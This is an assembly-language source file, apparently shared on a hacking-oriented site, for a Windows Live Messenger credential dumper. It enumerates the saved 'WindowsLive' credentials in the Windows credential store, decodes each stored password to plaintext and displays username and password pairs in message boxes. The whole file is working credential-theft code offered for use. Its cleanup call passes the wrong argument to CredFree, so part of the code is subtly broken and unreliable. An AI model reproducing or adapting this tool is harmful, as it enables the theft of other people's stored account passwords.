MSN.asm

Click here to download MSN.asm
; Credential Enumerater for Windows Live Messenger
; Based on many examples on the internet
; Coded for illwill by Matt (April 11, 2010)
; [edi+24] = BlobSize
; [edi+28] = BlobData
; [edi+48] = UserName


.586
.model		flat, stdcall
option		casemap:none

include         \masm32\include\windows.inc
include         \masm32\include\kernel32.inc
include         \masm32\include\user32.inc
include         \masm32\include\advapi32.inc
include         \masm32\include\crypt32.inc

includelib	\masm32\lib\kernel32.lib
includelib      \masm32\lib\user32.lib
includelib	\masm32\lib\advapi32.lib
includelib	\masm32\lib\crypt32.lib

.data
    szTitle     db "Live Messenger Retriever", 0 
    szErr       db "Error enumerating credentials", 0
    szCredLive  db "WindowsLive:name=*", 0
    szResultFmt db "Username: %s", 13, 10,"Password: %s", 0
    
.data?
    dwCount     dd ?   
    ccCreds     dd ?

    szResult    db 128 dup(?)
    szUser      db 64 dup(?)
    szPass      db 64 dup(?)
    

.code
start:
	invoke CredEnumerate, addr szCredLive, 0, addr dwCount, addr ccCreds
	test eax, eax               ; test for error
	jz @@err                    ; if 0 jump to error handler
	mov esi, ccCreds            ; copy credentials into esi register
	mov ecx, dwCount            ; save counter

@@:
	push ecx                    ; save current counter
	mov edi, [esi]              ; dereference esi
    
	; Clear buffers
	invoke RtlZeroMemory, addr szUser, sizeof szUser
	invoke RtlZeroMemory, addr szPass, sizeof szPass
	invoke RtlZeroMemory, addr szResult, sizeof szResult
    
	invoke lstrcpy, addr szUser, [edi+48]                                                               ; Copy username into buffer
	invoke WideCharToMultiByte, CP_ACP, 0, [edi+28], [edi+24], addr szPass, sizeof szPass, 0, 0         ; Convert unicode password to ascii
      xor edx, edx
      mov ecx, 2
      mov eax, [edi+24]
      div ecx
      mov byte ptr [szPass+eax], 0
	invoke wsprintf, addr szResult, addr szResultFmt, addr szUser, addr szPass                          ; format output
	invoke MessageBox, 0, addr szResult, addr szTitle, MB_ICONINFORMATION                               ; show output

	add esi, 4      ; get next cred
	pop ecx         ; restore counter
	dec ecx         ; decrease counter
	test ecx, ecx   ; does ecx == 0
	jecxz @@end     ; jump to end if 0 (no more accounts)
	jmp @B          ; else jump back and do next account

@@err:
	invoke MessageBox, 0, addr szErr, addr szTitle, MB_ICONSTOP	; display error

@@end:
	invoke CredFree, addr ccCreds                     	; free credentials
	invoke ExitProcess, 0                            	; exit our process
end start